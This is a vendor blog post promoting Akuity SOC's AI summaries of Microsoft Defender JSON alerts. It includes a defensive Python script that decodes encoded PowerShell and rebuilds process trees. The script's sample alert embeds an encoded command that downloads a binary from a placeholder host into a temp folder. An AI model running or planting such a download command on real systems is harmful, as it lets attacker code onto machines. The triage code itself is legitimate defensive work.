AI & SOC Operations

Why reading JSON Defender logs is your SOC’s worst enemy

5 min read · Akuity SOC · Delphisoft Deutschland

Manually parsing Microsoft Defender JSON payloads slows down your incident response. Find out how AI automates this decoding.

In modern security operations centers (SOCs), data is both a blessing and a curse. Microsoft Defender XDR (Extended Detection and Response) is among the most powerful detection solutions on the market. It captures the slightest anomalies across desktops, servers, messaging and cloud identities. However, the raw output of these detections arrives in a form that is hard for humans to read: the JSON (JavaScript Object Notation) format.

For a Level 1 (L1) SOC Analyst, spending your day manually reading and decoding JSON payloads of several thousand lines is not only tedious: it is the worst enemy of your productivity, your mental health, and the overall effectiveness of your cyber defense. Find out why this approach slows down your Mean Time to Resolution (MTTR) and how artificial intelligence solves this impasse.

Metadata Hell: What is a raw Defender payload?

When a suspicious event occurs — for example, an attempted network lateral movement or the injection of malicious code into a system process — Microsoft Defender generates an alert and sends it to the SIEM or your management console via API. This alert contains the entire technical context stored in a JSON file.

A raw JSON payload from Microsoft Defender typically contains:

  • Unique and opaque system identifiers (GUIDs, Tenant IDs, Device IDs).
  • Complete parent and child process histories with endless paths.
  • Complex nested structures listing modified registry keys, TCP/UDP network connections, and cryptographic hashes (SHA256 Hashes).
  • Script payloads that are frequently Base64 obfuscated or hidden by complex encoding functions.

For the human eye, interpreting this stream of raw text requires intense concentration. The analyst must scroll through thousands of lines, copy and paste character strings into third-party tools to decode them, and try to mentally reconstruct the attack execution tree. This manual deciphering is a major source of cognitive fatigue, often called alert fatigue. Even worse, information saturation dilutes critical weak signals amid a sea of innocuous metadata.
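To make the manual work described above concrete, here is a small added triage script (not part of the original article or of the Akuity product) that does the three chores by hand: it pulls the device and user out of the evidence, rebuilds the parent/child process tree from the process identifiers, and decodes a Base64 `-EncodedCommand` PowerShell argument. The sample alert is constructed and only loosely shaped like a Microsoft Graph security alert's `evidence` array; the field names are an assumption and every value is invented.

```python
import base64
import re

# Constructed sample shaped like the "evidence" array of a Microsoft Graph security alert
# (assumption: field names mirror Graph's processEvidence/deviceEvidence; values are invented).
ENCODED_PS = base64.b64encode("Invoke-WebRequest http://example.test/u.bin -OutFile $env:TEMP\\u.bin".encode("utf-16-le")).decode()
SAMPLE_ALERT = {
    "title": "Suspicious PowerShell launched by an Office application", "severity": "high",
    "evidence": [
        {"@odata.type": "#microsoft.graph.security.deviceEvidence", "deviceDnsName": "ws-042.corp.example"},
        {"@odata.type": "#microsoft.graph.security.processEvidence", "processId": 4120, "parentProcessId": 812,
         "imageFile": {"fileName": "WINWORD.EXE"},
         "processCommandLine": '"WINWORD.EXE" /n invoice.docm',
         "userAccount": {"accountName": "j.doe"}},
        {"@odata.type": "#microsoft.graph.security.processEvidence", "processId": 5528, "parentProcessId": 4120,
         "imageFile": {"fileName": "cmd.exe"},
         "processCommandLine": "cmd.exe /c powershell -NoP -enc " + ENCODED_PS},
    ],
}

# PowerShell accepts -e, -ec, -enc or -EncodedCommand; the argument is base64 of UTF-16LE text.
ENC_RE = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")

def decode_encoded_powershell(cmdline):
    """Return the plaintext behind an -EncodedCommand argument, or None if absent or malformed."""
    m = ENC_RE.search(cmdline)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def summarize(alert):
    """Reduce the evidence list to what an analyst needs: device, user, severity, process tree."""
    ev = alert.get("evidence", [])
    procs = [e for e in ev if e.get("@odata.type", "").endswith("processEvidence")]
    devs = [e.get("deviceDnsName") for e in ev if e.get("@odata.type", "").endswith("deviceEvidence")]
    users = sorted({p["userAccount"]["accountName"] for p in procs if "userAccount" in p})
    known = {p["processId"] for p in procs}
    tree = []
    def walk(p, depth):  # rebuild the parent/child chain from pid references
        tree.append("  " * depth + f"{p['imageFile']['fileName']} (pid {p['processId']})")
        decoded = decode_encoded_powershell(p.get("processCommandLine", ""))
        if decoded:
            tree.append("  " * (depth + 1) + f"[decoded -enc] {decoded}")
        for child in [c for c in procs if c.get("parentProcessId") == p["processId"]]:
            walk(child, depth + 1)
    for root in [p for p in procs if p.get("parentProcessId") not in known]:
        walk(root, 0)
    return {"device": devs[0] if devs else "unknown", "users": users,
            "severity": alert.get("severity"), "tree": tree}
```

Running `summarize(SAMPLE_ALERT)` yields the indented chain WINWORD.EXE → cmd.exe with the decoded PowerShell line beneath it, which is the picture an analyst otherwise assembles by scrolling.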

Loss of context in the midst of a cyber crisis

The main problem with manually reading JSON logs is fragmentation and wasted time during crises. Faced with a spreading ransomware attack, every minute of indecision allows the attacker to compromise new machines.

If your analyst spends 15 minutes reading the JSON to figure out that the alert came from a booby-trapped Word document that launched a command prompt (CMD) to download a malicious binary, the race is already lost. Fragmented navigation between the different tabs of the Microsoft native console to validate the metadata of the device or user concerned only accentuates this critical latency. The security expert spends his time doing textual micro-analysis rather than orchestrating emergency remediation actions.

The solution: Instant synthesis powered by AI

To give defenders the advantage again, a modern SOC platform like Akuity no longer requires humans to read raw data. An out-of-band artificial intelligence component ingests, parses and translates the JSON payload on the fly.

1. Natural language translation

When a ticket is opened within the Akuity SOC Ticket Panel, the "Details / Analysis" tab offers an immediate summary automatically written by the Google Gemini AI. The algorithm instantly reads thousands of lines of complex JSON sent by Microsoft Graph and generates a clear summary of the incident in just a few lines: who is patient zero, what action was attempted, and what the actual danger level is.

2. Access to raw JSON preserved for experts

Automation does not mean opacity. If a Level 2 or Level 3 (L2/L3) analyst wishes to conduct an in-depth (forensic) investigation or verify a specific cryptographic signature, the interface includes a dedicated "Download raw JSON" button. In one click, the expert recovers the original payload transmitted by Microsoft Defender, combining the speed of AI synthesis with the rigor of raw analysis.

3. Dynamic complexity hiding

To provide maximum visual comfort and avoid information overload, the Akuity ticket panel applies automatic masking of empty sections. If the incident does not have any impacted emails or network indicators, these components do not clutter the screen. The analyst only focuses on the real evidence of the attack (Intune devices impacted, Entra ID users compromised).

Conclusion: Free your analysts from menial tasks

Asking qualified cyber engineers to spend their time analyzing raw JSON text files is an economic and operational contradiction. By entrusting the analysis and initial synthesis to contextual artificial intelligence, you drastically reduce the fatigue of your teams and allow them to concentrate on their real added value: decision-making and rapid remediation.

Don't let your teams drown in raw logs anymore. Find out how the Akuity SOC AI-assisted Cockpit instantly translates the complexity of Microsoft Defender.

Related solution page

Defender Logs analysis powered by Gemini AI

Translate the complexity of Defender threats with Google Gemini AI: executive committee (Comex) summaries, an analyst chat, and automatic qualification of false positives.

Discover the complete solution